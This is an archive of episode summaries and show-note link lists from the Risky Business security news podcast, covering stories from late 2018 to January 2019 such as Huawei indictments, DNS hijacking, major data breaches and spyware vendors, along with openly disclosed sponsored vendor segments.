We also have a sponsor interview for you this week with Zane Lackey, the co-founder of Signal Sciences. I guess you’d call these guys “next generation WAF,” more on that later… but Zane will be along a little bit later with some pretty incredible stats on the way security spending has changed over the last year or two. Money is just piling into appsec while spending on some other controls is actually falling. It’s a sign of change.

Show notes
USENIX Enigma 2016 - NSA TAO Chief on Disrupting Nation State Hackers - YouTube
CLARK | Cybersecurity Library

Risky Business #528 -- Huawei dinged, epic FaceTime and Exchange bugs

Jan 29, 2019


Adam Boileau co-hosts this week’s Risky Business episode. We talk about:

The Huawei indictments
The epic Facetime logic bug
The even more epic Exchange privesc bug
CISA’s “fix yo DNS” directive
Black Cube busted doing shady stuff to Citizen Lab
Yahoo shareholder lawsuit settlement makes directors twitchy
Internet filtering kicks off in Venezuela
Much, much MORE!

This week’s show is brought to you by Thinkst Canary – they make hardware honeypots and the tools you need to deploy canarytokens at scale. They also make virtual honeypots! This week Thinkst’s founder Haroon Meer will be along to wave his finger at basically all of us over what he sees as the security discipline’s tendency to not really learn anything from security conferences. It’s “contertainment,” he says, followed by “GET OFF MY LAWN”.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
US hammers Huawei with 23 indictments for stolen trade secrets, fraud - CNET
Major iPhone FaceTime bug lets you hear the audio of the person you are calling ... before they pick up - 9to5Mac
Abusing Exchange: One API call away from Domain Admin
DHS: Multiple US gov domains hit in serious DNS hijacking wave | Ars Technica
Emergency Directive 19-01
Rep. Langevin: We need a DHS briefing to understand extent of DNS hijacking threat
ALERT: DNS hijacking activity - NCSC Site
APNewsBreak: Undercover agents target cybersecurity watchdog
Japanese government plans to hack into citizens' IoT devices | ZDNet
Internet experiment goes wrong, takes down a bunch of Linux routers | ZDNet
Lessons for Corporate Boardrooms From Yahoo’s Cybersecurity Settlement - The New York Times
Mystery still surrounds hack of PHP PEAR website | ZDNet
WordPress sites under attack via zero-day in abandoned plugin | ZDNet
OONI report into Internet filtering in Venezuela
Tonga sent back to 'dark ages' after underwater Internet cable severed | Fox News
Opinion | Mueller’s Real Target in the Roger Stone Indictment - The New York Times
Exclusive: Ukraine says it sees surge in cyber attacks targeting election | Reuters
This Time It’s Russia’s Emails Getting Leaked
Russia Targeting British Institute In Disinformation Campaign
Unsecured MongoDB databases expose Kremlin's backdoor into Russian businesses | ZDNet
Facebook to encrypt Instagram messages ahead of integration with WhatsApp, Facebook Messenger | TechCrunch
Cryptopia funds still being drained by hackers while police investigated | RNZ News
Europol arrests UK man for stealing €10 million worth of IOTA cryptocurrency | ZDNet
Police license plate readers are still exposed on the internet | TechCrunch
Malvertising campaign targets Apple users with malicious code hidden in images | ZDNet
Hackers are going after Cisco RV320/RV325 routers using a new exploit | ZDNet
Spencer Dailey on Twitter: "hard to understate how bad this flaw is--shocked more pubs haven't picked up on this. The affected chip is ubiquitous, the potential exploits allow anyone within wifi-range to run arbitrary code on the machine. Wifi routers themselves use affected chip 🤯"
GitHub - hannob/apache-uaf: Apache use after free bug infos / ASAN stack traces
Lesley Carhart on Twitter: "At the very least I’ll be able to publish these questions so that other people can grill their properties should they forcibly migrate to IoT equipment."
APT39: An Iranian Cyber Espionage Group Focused on Personal Information | FireEye Inc
44CON 2013 - A talk about (info-sec) talks - Haroon Meer - YouTube

Risky Business #527 -- Featuring Alex Stamos, The Grugq, Susan Hennessey, Brian Krebs, Kelly Shortridge and Bobby Chesney

Jan 22, 2019


Alex Stamos co-hosts this week’s episode. Topics discussed include:

DNC says Russia tried to own its servers in November 2018
South Korean Defence Ministry owned
Lazarus Group busy in Chile
West African banks suffer multiple intrusions
Michael Cohen admits rigging online poll for Trump
Nine charged over SEC hack
More USG SSL certificates due to expire
apt-get remote root RCE
Don’t use your Garmin to scope your murder escape route
Big plot twist in viral video outrage

This week’s show is brought to you by Duo Security, which I guess is now Cisco Duo Security. Wendy Nather - Duo’s head of advisory CISOs - will be along in this week’s sponsor interview to talk about a topic near and dear to my heart: victim shaming. That’s a good one so please do stick around for that.

Links to everything that we discussed are below and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes
DNC says Russia tried to hack its servers again in November 2018 | ZDNet
Hackers breach and steal data from South Korea's Defense Ministry | ZDNet
North Korean hackers infiltrate Chile's ATM network after Skype job interview | ZDNet
West African banks hit by multiple hacking waves last year | ZDNet
Michael Cohen says Trump directed him to pay for poll rigging - CNNPolitics
Nine defendants charged in SEC hacking scheme that netted $4.1 million | Ars Technica
773M Password ‘Megabreach’ is Years Old — Krebs on Security
Advertising network compromised to deliver credit card stealing code | ZDNet
Major Security Breach Discovered Affecting Nearly Half of All Airline Travelers Worldwide | Safety Detective
These are all the federal HTTPS websites that’ll expire soon because of the US government shutdown | TechCrunch
The Hacker News on Twitter: "We all love your media player, but that’s really rude #VLC 🙄 VLC developers refused to consider #software "update-over-HTTP" as a threat. Responded→ “no threat model. no proof. no #security bug" It wouldn't hurt if you simply consider the suggestion.…"
Remote Code Execution in apt/apt-get
Hitman Runner Mark Fellows Convicted of Mob Murder on GPS Watch Data
HN Front Page on Twitter: "FBI arrests PureVPN user with log data that was said to not exist L: C:"
Lin Affidavit
Huawei founder says company would not share user secrets | The Sacramento Bee
Opinion | If 5G Is So Important, Why Isn’t It Secure? - The New York Times
Facebook’s Sputnik Takedown — In Depth – DFRLab – Medium
Covington students, Nathan Phillips viral video: Twitter suspends account that helped ignite controversy - CNN
Russia tries to force Facebook and Twitter to relocate servers to Russia | Ars Technica
Forget Bitcoin: Why Criminals are Using Fortnite to Launder Illicit Funds
Fortnite security issue would have granted hackers access to accounts | ZDNet
VC funding of cybersecurity companies hits record $5.3B in 2018 | TechCrunch

Risky Business #526 -- Huawei arrest in Poland, DPRK SWIFT hack conviction, more from the El Chapo trial

Jan 15, 2019


This week’s podcast features Patrick and Adam talking about the week’s security news, including:

Huawei staffer arrested for spying in Poland
Conviction in DPRK SWIFT hack against Bangladesh central bank
El Chapo used Flexispy to spy on mistresses and staff
NSO group on charm offensive
Iran hijacking DNS entries, conducting PITM with DV certs
Kaspersky tipped NSA on Hal Martin
US government certificates expire amid shutdown
Idiot sentenced to 10 years prison for DDoSing children’s hospital

This week’s show is brought to you by Trail of Bits! Trail of Bits is a security engineering firm and consultancy based in New York. They aren’t a typical pen-testing firm, they build as well as break.

In this week’s sponsor interview JP Smith from Trail of Bits joins us to talk about the work he put in to CSAW. Not the Centre for Sustainable Architecture with Wood, which is a thing, but the Cyber Security Awareness Worldwide CTF.

JP is a sick man. He’s sick. You’ll hear about the mind-bending CTF challenges he put together for CSAW. Remarkably, some teams were actually able to solve his problems, some of which featured complex numbers mapped to a four dimensional unit sphere being used to drive the rotation of a virtual IBM Selectric typewriter golfball in Second Life. As I say, he’s a sick, sick man.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Poland spy arrest: China telecoms firm Huawei sacks employee - BBC News
Ex-RCBC manager guilty in $81-M heist | The Manila Times Online
Alan Feuer on Twitter: "Chapo would play a little game. He would call people who had the “special” phones and chat with them a while then hang up, secretly activate the mic and listen to what they said about him."
Chapo’s I.T. Guy: Working for a Kingpin Can Cause a Nervous Breakdown - The New York Times
Exclusive: How Mexican drug baron El Chapo was brought down by technology made in Israel
A Worldwide Hacking Spree Uses DNS Trickery to Nab Data | WIRED
Global DNS Hijacking Campaign: DNS Record Manipulation at Scale | FireEye Inc
Exclusive: How a Russian firm helped catch an alleged NSA data thief - POLITICO
.gov security falters during U.S. shutdown | Netcraft
Senators Call on FCC To Investigate T-Mobile, AT&T, and Sprint Selling Location Data to Bounty Hunters - Motherboard
Google Demanded That T-Mobile, Sprint Not Sell Google Fi Customers' Location Data - Motherboard
AT&T to Stop Selling Location Data to Third Parties After Motherboard Investigation - Motherboard
Feds Can't Force You To Unlock Your iPhone With Finger Or Face, Judge Rules
Ryuk ransomware gang probably Russian, not North Korean | ZDNet
Man gets 10 years for cyberattack on Boston Children's Hospital
Hacker 'BestBuy' sentenced to prison for operating Mirai DDoS botnet | ZDNet
Police get report of a shooting only to find out it was a prank - Palo Alto Daily Post
Scooter startup Bird tried to silence a journalist. It did not go well. | TechCrunch
Yet another Qld cop charged with hacking - Security - iTnews
Some of the biggest web hosting sites were vulnerable to simple account takeover hacks | TechCrunch
$900,000 On Offer For Anyone Who Can Hack A Tesla Model 3
SCP implementations impacted by 36-years-old security flaws | ZDNet
Google Chrome's built-in ad blocker to roll out worldwide on July 9 | ZDNet
Gaining access to Uber's user data through AMPScript evaluation – Assetnote
Rahul Sridhar on Twitter: "Here's a short story about cryptography in 2018 in five tweets:"

Risky Business #525 -- Back on deck for 2019!

Jan 9, 2019


In this week’s show Adam Boileau and Patrick Gray discuss the security news of the last few weeks, including:

German politicians pwnt, suspect arrested
Possible ransomware attack affects US newspapers
Mass 2FA bypasses impacting Gmail users in Middle East
Emergency warning system in Australia popped
Ethereum Classic double-spend attack a sign of things to come
EU to fund open source bug bounties
Attackers steal details of 1,000 North Korean defectors
Doing the Bloomberg hack for real at 35C3
El Chapo should have used Signal
Much, much more…

This week’s show is brought to you by Cylance! BlackBerry announced that it’s acquiring Cylance for $1.4bn (I don’t know if that’s closed yet) which is great news for all the founders and early employees there – some of whom I know reasonably well. So congrats to team Cylance on that!

But we’re not talking about that this week. Instead, Cylance’s very own Scott Scheferman joins us to talk about the MITRE ATT&CK framework and how it’s informing their product dev. There’s some product talk in that interview but there’s also some real meat there so I let it run long. Scott says we’re close to the terrible situation where security companies are going to start using MITRE ATT&CK as a marketing tool, like “Full MITRE ATT&CK coverage!”

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Arrested German hacker confesses to leaking politicians' information, report says
Before Germany’s Massive Hack, We Learned What Not to Do With Sensitive Stolen Information - Motherboard
What we still don’t know about the cyberattack on Tribune newspapers - The Washington Post
Ransomware suspected in cyberattack that crippled major US newspapers | ZDNet
How Hackers Bypass Gmail 2FA at Scale - Motherboard
Hackers target 'hundreds' of Middle East activists with fake login pages, 2FA bypass schemes
Hackers send fake emergency emails, texts, messages using warning system
Coinbase suspends Ethereum Classic (ETC) trading after double-spend attacks | ZDNet
I Gave a Bounty Hunter $300. Then He Located Our Phone - Motherboard
EU to fund bug bounty programs for 14 open source projects starting January 2019 | ZDNet
Hackers hijack thousands of Chromecasts to warn of latest security bug | TechCrunch
Hackers steal personal info of 1,000 North Korean defectors | ZDNet
Modchips - Trammell Hudson's Projects
Hacking Group Decrypts Cache of Insurance Files Related to 9/11 Attacks - Motherboard
Hackers Make a Fake Hand to Beat Vein Authentication - Motherboard
You Can Now Get $1 Million for Hacking WhatsApp and iMessage - Motherboard
Alan Feuer on Twitter: "In February 2010, an undercover FBI agent met with the target of a sensitive investigation: Christian Rodriguez, an IT specialist who had recently developed a remarkable product: an encrypted communication network for the Mexican drug lord El Chapo and his Colombian partners."
Encrypted Messaging App Signal Says It Won’t Comply With Australia’s New Backdoor Bill - Motherboard
Louis Theroux among those hit by Twitter hack exposing security flaw | Technology | The Guardian
NSA to release a free reverse engineering tool | ZDNet
Open-source tool aims to curb BGP hijacking amid Chinese espionage concerns
ARTEMIS — neutralizing BGP hijacking within a minute | APNIC Blog
New hardware-agnostic side-channel attack works against Windows and Linux | ZDNet
1901.01161.pdf
PowerPoint presentation
CVE-2019-0547 | Windows DHCP Client Remote Code Execution Vulnerability

Risky Biz Soap Box: From 2 billion events to 350 alerts with Respond Software

Dec 14, 2018


Soap Box is the podcast series we do here at Risky.Biz where we have detailed discussions with vendors about all sorts of stuff – sometimes it’s about their products, other times it’s about the landscape as they see it, other times it’s about research they’ve done that they want to promote. Soap Box is a wholly sponsored podcast series – just so you know – so everyone you hear on it paid to be on it.

And this Soap Box edition is brought to you by Respond Software. We’ll be joined by Respond Software’s co-founder and CEO, Mike Armistead, to talk about Respond’s tech. Mike has an interesting history in infosec… he actually co-founded Fortify, the software security firm, before winding up at HPE as the VP and General Manager for ArcSight, the poor fella. But he’s free now! Freeeeeee! And he’s co-founded the venture we’re talking about today.

So, what’s the idea behind Respond Software? Well, to break it down into really simple terms the whole idea is to take all the zillions of events your existing security kit flags and distill them down into meaningful alerts. To put this into context, Mike says that during the 30 days in the lead up to the interview we recorded, his customers fed two billion events into their Respond Software gear. Of those two billion events, Respond deemed 7 million of them worthy of escalation, and from there determined 45,000 were malicious, but then… and this is the cool part, this only resulted in 350 incidents raised by the Respond platform. From 2 billion to 350.

So it’s a great idea – tune out the crap and look at meaningful correlations. Automate the decision making around what’s serious and what’s not. You’ve got all this gear, maybe you’ve got something aggregating it, but what’s applying decision logic to it?

Mike sent me a list of software Respond currently supports: all manner of IDSes, AV and EDR suites and then other stuff that gives their software the context it needs to make better decisions, like Active Directory, Nessus, Qualys, Splunk, QRadar… whatever! The idea is, plug ALL your over-alerting crap into Respond Software’s gear and it’ll do a good enough job of correlating events that you’ll only have to deal with what’s real. Well, that’s the pitch. Mike Armistead joined me to flesh it out a bit more.

Show notes
Emulating the decision-making of an expert security analyst | Respond Software

Risky Business #524 -- Huawei CFO arrested, US Government dumps on Equifax

Dec 12, 2018


This is the last weekly Risky Business podcast for 2018. We’ll be posting a Soap Box edition early next week then going on break until January 9.

In this week’s show Adam Boileau and Patrick Gray discuss the week’s security news:

Huawei’s CFO arrested over sanctions violations
BT in the UK removes Huawei equipment from 4G network
Australia passes controversial surveillance law
US House Oversight Committee blasts Equifax in scathing report
Bloomberg plays word-games on Super Micro story
MOAR

This week’s show is sponsored by Bugcrowd. In this week’s sponsor interview Bugcrowd’s CTO and founder Casey Ellis tells us why his company is launching “pay for effort” products to run alongside bounty programs.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
US, China executives grow wary about travel after Huawei arrest
Canadian court grants bail to CFO of China's Huawei | Reuters
Michael Kovrig: Canadian ex-diplomat 'held in China' - BBC News
BT removing Huawei equipment from parts of 4G network | Technology | The Guardian
China's cyber-espionage against U.S. is 'more audacious,' NSA official says amid Huawei flap
China spied on African Union headquarters for five years — Quartz Africa
House panel: Equifax breach was ‘entirely preventable’
Committee Releases Report Revealing New Information on Equifax Data Breach - United States House Committee on Oversight and Government Reform
Experian Exposes Apparent Customer Data in Training Manuals - Motherboard
NotPetya leads to unprecedented insurance coverage dispute
Over 40,000 credentials for government portals found online | ZDNet
What's actually in Australia's encryption laws? Everything you need to know | ZDNet
Australia's encryption laws will fall foul of differing definitions | ZDNet
Australia Just Became The Testing Ground For Breaking Into Encryption
Matthew Green on Twitter: "GCHQ has proposal to surveill encrypted messaging and phone calls. The idea is to use weaknesses in the “identity system” to create a surveillance backdoor. This is a bad idea for so many reasons. Thread. 1/"
Melbourne terror attack plot suspects arrested in police raids over mass shooting fears - ABC News (Australian Broadcasting Corporation)
Why Scott Morrison is right on encryption but wrong on Muslims
Super Micro Says Third-Party Test Found No Malicious Hardware - Bloomberg
Someone Defaced Website With ‘Goatse’ And Anti-Diversity Tirade - Motherboard
Nearly 250 Pages of Devastating Internal Facebook Documents Posted Online By UK Parliament - Motherboard
Internal Documents Show Facebook Has Never Deserved Our Trust or Our Data - Motherboard
Google+ Exposed Data of 52.5 Million Users and Will Shut Down in April | WIRED
Iranians indicted in Atlanta city government ransomware attack | Ars Technica
Report: FBI opens criminal investigation into net neutrality comment fraud | Ars Technica
Police arrest hacker behind WeChat ransomware attack - CGTN
A bug in Microsoft’s login system made it easy to hijack anyone’s Office account | TechCrunch
For the fourth month in a row, Microsoft patches Windows zero-day used in the wild | ZDNet
Hackers ramp up attacks on mining rigs before Ethereum price crashes into the gutter | ZDNet
OpSec mistake brings down network of Dark Web money counterfeiter | ZDNet
Google CEO Says No Plan to ‘Launch’ Censored Search Engine in China - Motherboard
Marriott to reimburse some guests for new passports after massive data breach | ZDNet
Eastern European banks lose tens of millions of dollars in Hollywood-style hacks | ZDNet
Industrial espionage fears arise over Chrome extension caught stealing browsing history | ZDNet
Hacker Fantastic on Twitter: ""open-source is more secure than closed-source because you can view the source code" ... GNU inetutils <= 1.9.4 telnet.c multiple overflows"
Your Apps Know Where You Were Last Night, and They’re Not Keeping It Secret - The New York Times
APPSEC CALIFORNIA 2019 - OWASP AppSec California 2019
Next Gen Pen Testing

Snake Oilers 8 part 2: Forticode's Cipherise, device features from Exabeam and SentinelOne on "active EDR"

Dec 10, 2018


Snake Oilers is the podcast where we get a bunch of vendors together to pitch their stuff – they all pay to participate, just so you know – and today we’re going to hear three pitches from tech companies: one from Forticode, one from Exabeam and one from SentinelOne.

That’s right, we talk to vendors to get their best pitches so you don’t have to!

Forticode joins us to pitch its Cipherise platform – applied PKI wrapped into a slick mobile platform that helps large organisations authenticate their users, and helps their users authenticate them.

Exabeam will be talking about how they’re doing more device analytics in their SIEM platform and SentinelOne will be talking about how they differentiate themselves in the highly competitive EDR space.

Links to all of these companies are below.

Show notes
Forticode
Introducing Behavioral Analysis for Devices - Exabeam
Entity Analytics - Exabeam
Why SentinelOne

Risky Business #523 -- So many breaches

Dec 5, 2018


This week’s show features Patrick Gray and Adam Boileau discussing the week’s security news, including:

The Marriott, Quora, Dell and Sky Brazil data breaches
Khashoggi associate to sue NSO Group
Australia’s AA Bill set to pass
NZ gives Huawei the boot
AutoCAD malware targets key verticals
Republicans’ 2018 campaign hacked
Czech government blames Russia for intrusions into key systems
Horror-show bug in Kubernetes

This week’s show is brought to you by Duo Security, big thanks to Duo for that! In this week’s sponsor interview we’ll be chatting with Duo Security’s very own Dave Lewis about some BeyondCorp stuff. BeyondCorp is the enterprise computing model of the future and Dave will be along after this week’s news to talk about some of its finer points.

Links to everything that we discussed are below. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Marriott: Data on 500 Million Guests Stolen in 4-Year Breach — Krebs on Security
Marriott sued hours after announcing data breach | ZDNet
Quora Announces Data Breach of 100 Million Users - Motherboard
Dell announces security breach | ZDNet
Sky Brasil exposes data of 32 million subscribers | ZDNet
Israeli Software Helped Saudis Spy on Khashoggi, Lawsuit Says - The New York Times
Police, spies gain powers to access encrypted messages after political deal struck
GCHQ’s not-so-smart idea to spy on encrypted messaging apps is branded ‘absolute madness’ | TechCrunch
Principles for a More Informed Exceptional Access Debate - Lawfare
Defence department exposed by Chinese hackers
'Watering hole' attacks: How China's hackers went after think tanks and universities
Huawei banned from New Zealand's 5G mobile network over security concerns - ABC News (Australian Broadcasting Corporation)
20180717_HCSEC_Oversight_Board_Report_2018_-_FINAL.pdf
UK and Germany grow wary of Huawei as US turns up pressure | Financial Times
New industrial espionage campaign leverages AutoCAD-based malware | ZDNet
House Republican campaign arm hacked during 2018 election
Czech Republic blames Russia for multiple government network hacks | ZDNet
Magecart Group Ups Ante: Now Goes After Admin Credentials | Threatpost | The first stop for security news
FBI dismantles gigantic ad fraud scheme operating across over one million IPs | ZDNet
After Microsoft complaints, Indian police arrest tech support scammers at 26 call centers | ZDNet
"WeChat Payment" ransomware makers are locked in transmission, harm and epidemic ultimate decryption
Kubernetes' first major security hole discovered | ZDNet
Researchers discover SplitSpectre, a new Spectre-like CPU attack | ZDNet
Hackers are opening SMB ports on routers so they can infect PCs with NSA malware | ZDNet
Microsoft warns about two apps that installed root certificates then leaked the private keys | ZDNet
Project Zero: Adventures in Video Conferencing Part 1: The Wild World of WebRTC
Cyber attack victims face disputes with insurers | Financial Times
unprivileged users with UID > INT_MAX can successfully execute any systemctl command (#74) · Issues · polkit / polkit · GitLab

Snake Oilers 8 part 1: Rapid7's InsightAppSec, WhiteSource and VirusTotal Enterprise

Dec 3, 2018


This is the first part of our final Snake Oilers edition for 2018.

Snake Oilers, for people who don’t know it, is the podcast where vendors pay to come on to the show to promote their wares. This series actually turned out to be way more popular than we expected. People quite like listening to security companies actually explaining what they do in clear terms.

We have six vendors participating in this last round of Snake Oilers for the year – we’ve split the podcast into two podcasts containing three vendor pitches each, and in this part you’ll be hearing pitches from Rapid7, WhiteSource and Chronicle.

Dan Kuykendall of Rapid7 talks InsightAppSec, its DAST solution.
David Habusha of WhiteSource talks software composition analysis.
Brandon Levene of Chronicle talks VirusTotal Enterprise.

Part two is up next week!

Show notes
InsightAppSec | Rapid7
Open Source Security and License Management | WhiteSource
Introducing VirusTotal Enterprise – Chronicle Blog – Medium

Risky Business #522 -- Alex Stamos co-hosts the show, reflects on Snowden disclosures

Nov 28, 2018


We’ve got a slightly different edition of the show this week – Alex Stamos is filling in for Adam Boileau in the news slot.

Most of you know him as Facebook’s recently departed chief security officer. Alex also served as the CSO at Yahoo for a time, but his security career stretches back a long way. He co-founded iSEC Partners back in 2004, and before that he did some time with @Stake.

The @Stake mafia is everywhere.

These days Alex is an adjunct professor at Stanford University. He joined me to talk about the week’s security news, as well as to have a chat about the Edward Snowden disclosures, five years on.

This week’s show is brought to you by Thinkst Canary, big thanks to them for that. And instead of one of their staff being on the show this week in the sponsor chair, they asked me to interview this week’s sponsor guest, their customer, Mike Ruth, a security engineer with Cruise Automation.

Mike did a presentation at a conference called QCon recently all about automating the deployment of canary tokens at scale using some nifty CI/CD tricks. He’ll be joining us after the news to tell us all about that.

Items discussed in this week’s news:

NSO Group busted selling to Saudi Arabia
NSO malware targets Mexican journalists
Edward Snowden claims NSO connection in Khashoggi case
Australia’s AA Bill latest
npm supply-chain attack targets Bitcoiners
Guardian reports Manafort met Assange, denials, lawsuits flying already
UK parliament seizes Facebook documents
Uber fined over 2016 breach coverup
UK cops decline to charge bug reporter
USPS finally fixes data exposure after Krebs intervention
Rowhammer attack bypasses ECC protections
Bloomberg is investigating its own reporting on Supermicro
Magecart is everywhere
Google, Mozilla plan browser access to file systems

Links to everything that we discussed are below and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes
Israeli hacking firm NSO Group offered Saudis cellphone spy tools - report | The Times of Israel
Edward Snowden: Israeli spyware was used to track and eventually kill Jamal Khashoggi | Business Insider
A Journalist Was Killed in Mexico. Then His Colleagues Were Hacked. - The New York Times
Home Affairs attempts to allay concerns about Australian exporters for encryption-busting Bill | ZDNet
Widely used open source software contained bitcoin-stealing backdoor | Ars Technica
I don't know what to say. · Issue #116 · dominictarr/event-stream · GitHub
Manafort held secret talks with Assange in Ecuadorian embassy, sources say | US news | The Guardian
UK parliament seizes cache of internal Facebook documents to further privacy probe | TechCrunch
Uber fined $1.17 million by U.K., Dutch authorities for 2016 breach
UK cops won't go after researcher who reported security issue to York city officials | ZDNet
USPS Site Exposed Data on 60 Million Users — Krebs on Security
Potentially disastrous Rowhammer bitflips can bypass ECC protections | Ars Technica
Bloomberg is still reporting on challenged story regarding China hardware hack - The Washington Post
Magecart group hilariously sabotages competitor | ZDNet
Amazon admits it exposed customer email addresses, but refuses to give details | TechCrunch
Google, Mozilla working on letting web apps edit files despite warning it could be 'abused in terrible ways' - TechRepublic
Germany proposes router security guidelines | ZDNet
Half of all Phishing Sites Now Have the Padlock — Krebs on Security
The Snowden Legacy, part one: What’s changed, really? | Ars Technica
QConSF18 - Canaries - Google Drive
Canary — know when it matters

Risky Biz Soap Box: MITRE ATT&CK Matrix, misconfigured security controls, attack sim and more!

Nov 25, 2018


The Soap Box podcast series is a wholly sponsored podcast series we do here at Risky.Biz – vendors pay to participate. This Soap Box edition is brought to you by AttackIQ.

AttackIQ is a five-year-old company that makes an attack simulation platform. The idea is you agitate a network with suspicious traffic and activities, then measure what the response looks like on the other side. As you’ll hear, AttackIQ’s CTO Stephan Chenette argues this is a better way to test your controls than trying to do it after an incident has been and gone.

Mostly people are using it to verify the effectiveness of their security controls. They already have endpoint security software, IDS, various monitoring bits and pieces, but quite often this stuff just isn’t tuned right. So, you throw some attack traffic and behaviour at your systems and see what bubbles up.

One piece of work that has been absolutely vital to AttackIQ’s success is the MITRE ATT&CK Matrix. Like AttackIQ, the ATT&CK Matrix has been around for five years.

Stephan Chenette is AttackIQ’s CTO and he joined me to talk all about how they’re trying to use the ATT&CK Matrix to drive their whole outlook, and, conversely, how they’re spending time talking to MITRE about where the whole thing is going.

Show notes
MITRE ATT&CK™
AttackIQ

Risky Business #521 -- Bears everywhere

Nov 21, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Cozy Bear is back, Fancy Bear has new tooling
Russian government wants DNC lawsuit thrown out
Cyber Command submitting samples to VirusTotal
Google BGP shenanigans
Australian/China Telecom BGP shenanigans
All the recent Facebook drama
More speculative execution bugs
Julian Assange likely to be charged
Vault7 leaker facing new charges
Phineas Fisher investigation abandoned
Bitcoin/Tether link probed by DoJ, btc in free-fall
MUCH MOAR

This week’s show is brought to you by Proofpoint.

Sherrod DeGrippo, Proofpoint’s director of threat research and detection, is this week’s sponsor guest. Surprisingly, she tells us that ransomware via email is a dead duck.

Links to everything that we discussed are below. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Russia’s Cozy Bear comes out of hiding with post-election spear-phishing blitz | Ars Technica
Russia's Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks | WIRED
Russia wants DNC hack lawsuit thrown out, citing international conventions | ZDNet
Russian Trolls Sue Facebook, Their Old Propaganda Machine
Ukraine detects new Pterodo backdoor malware, warns of Russian cyberattack | Ars Technica
US Cyber Command starts uploading foreign APT malware to VirusTotal | ZDNet
Google goes down after major BGP mishap routes traffic through China | Ars Technica
How China diverts, then spies on Australia's internet traffic
Rob Joyce on Twitter: "I hope this latest fiasco of traffic rerouting through China is the wakeup call for all of us to get serious about addressing the massive and unacceptable vulnerability inherent in today’s BGP routing architecture."
Everything you need to know about Facebook’s latest crisis - Recode
Facebook has been accused of peddling anti-Semitic conspiracy theories - Vox
Yes, Facebook made mistakes in 2016. But we weren’t the only ones. - The Washington Post
Researchers discover seven new Meltdown and Spectre attacks | ZDNet
The US Department of Justice is reportedly preparing to indict WikiLeaks founder Julian Assange | Business Insider
Julian Assange has been charged, prosecutors reveal inadvertently in court filing
Accused 'Vault 7' leaker to face new charges
Hacking Team Hacker Phineas Fisher Has Gotten Away With It - Motherboard
Bitcoin Price Manipulated by Tether? Justice Department Probing - Bloomberg
A Browser Extension Apparently Stole The Private Facebook Messages Of At Least 81,000 Accounts | Gizmodo Australia
The Hack Millions of People Are Installing Themselves - Motherboard
Facebook patches another bug that could have allowed mass-harvesting of user data | ZDNet
Trump signs bill that creates the Cybersecurity and Infrastructure Security Agency | ZDNet
AWS rolls out new security feature to prevent accidental S3 data leaks | ZDNet
Most ATMs can be hacked in under 20 minutes | ZDNet
Deserialization issues also affect Ruby, not just Java, PHP, and .NET | ZDNet
Adobe ColdFusion servers under attack from APT group | ZDNet
VirtualBox zero-day published by disgruntled researcher | ZDNet
Office 365, Azure users are locked out after a global multi-factor authentication outage | TechCrunch
Cisco says a flaw in its Adaptive Security Appliance allows remote attacks
He Helped People Cheat at Grand Theft Auto. Then His Home Was Raided. - The New York Times
Proofpoint

Risky Business #520 -- Tanya Janca talks security in the curriculum

Oct 31, 2018


We’ve got a great podcast for you this week. Tanya Janca will be talking about some volunteer work she’s been doing with a Canadian government panel on getting security content into children’s school curriculums.

In this week’s sponsor interview we’ll be talking with Ferruh Mavituna of Netsparker.

They launched Netsparker Cloud a while ago, so now they have some decent telemetry, and I wanted to ask Ferruh what he’s found surprising now that he’s sitting on a mountain of scan results. The types of bugs being turned up aren’t really a surprise, but the extent to which old software is a problem was actually pretty surprising to him. He knew it was bad, he says, but he didn’t know it was this bad.

Adam Boileau, as usual, joins the show this week to talk about all the week’s security news:

More Chinese MSS officers indicted by the US DoJ
ASD chief speaks publicly on 5G Huawei ban
China playing funny buggers with BGP
Russia is still messing with the US during the midterms
Facebook boots more Iranian influence pages
New privacy features in Signal
Plus much, much more!

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Chinese Intelligence Officers and Their Recruited Hackers and Insiders Conspired to Steal Sensitive Commercial Aviation and Technological Data for Years | OPA | Department of Justice
U.S. charges Chinese intelligence officers for jet engine data hack
Huawei's ban to 5G network 'supported by technical advice', spy agency chief says - ABC News (Australian Broadcasting Corporation)
Canadian security boss ain't afraid of no Huawei, sees no reason for ban • The Register
US bans exports to Chinese DRAM maker citing national security risk | ZDNet
China has been 'hijacking the vital internet backbone of western countries' | ZDNet
Russia Is Meddling In The Midterms. The White House Just Isn't Talking About It.
The Crisis of Election Security - The New York Times
DHS: Election officials inundated, confused by free cyber-security offerings | ZDNet
Facebook removes more Iran-linked accounts, this time targeting the US & UK | ZDNet
We posed as 100 senators to run ads on Facebook. Facebook approved all of them. – VICE News
NYT: Chinese and Russian spies routinely eavesdrop on Trump’s iPhone calls | Ars Technica
North Korea blamed for two cryptocurrency scams, five trading platform hacks | ZDNet
New Signal privacy feature removes sender ID from metadata | Ars Technica
Windows Defender becomes first antivirus to run inside a sandbox | ZDNet
Pakistani bank denies losing $6 million in country's 'biggest cyber attack' | ZDNet
Many CMS plugins are disabling TLS certificate validation... and that's very bad | ZDNet
Twelve malicious Python libraries found and removed from PyPI | ZDNet
How ‘Mr. Hashtag’ Helped Saudi Arabia Spy on Dissidents - Motherboard
Government Spyware Vendor Left Customer, Victim Data Online for Everyone to See - Motherboard
Apple's T2 Security Chip Makes It Harder to Tap MacBook Mics | WIRED
Microsoft Windows zero-day disclosed on Twitter, again | ZDNet
Digital DASH – ICTC - Focus on Information Technology (FIT)

Risky Biz Soap Box: Duo's Olabode Anise recaps his Black Hat talk on Twitter bots

Oct 26, 2018


Soap Box is the wholly sponsored podcast series we do where vendors pay to participate. They sometimes want to talk about their products, other times they want to talk about general ecosystem stuff, other times they want to talk about research they’ve done.

